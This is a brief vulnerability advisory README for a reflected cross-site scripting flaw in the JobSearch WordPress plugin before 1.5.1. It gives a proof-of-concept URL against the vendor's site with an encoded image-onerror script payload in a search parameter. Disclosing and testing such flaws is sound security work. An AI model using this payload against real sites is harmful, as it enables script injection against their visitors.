.. | |||
README.md | Loading last commit info... |
README.md
JobSearch < 1.5.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
Description
There is a Cross-Site Scripting vulnerability in the JobSearch plugin.
Proof of Concept
https://eyecix.com/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E&ajax_filter=true&posted=all&sort-by=recent
References
https://wpscan.com/vulnerability/bcf38e87-011e-4540-8bfb-c93443a4a490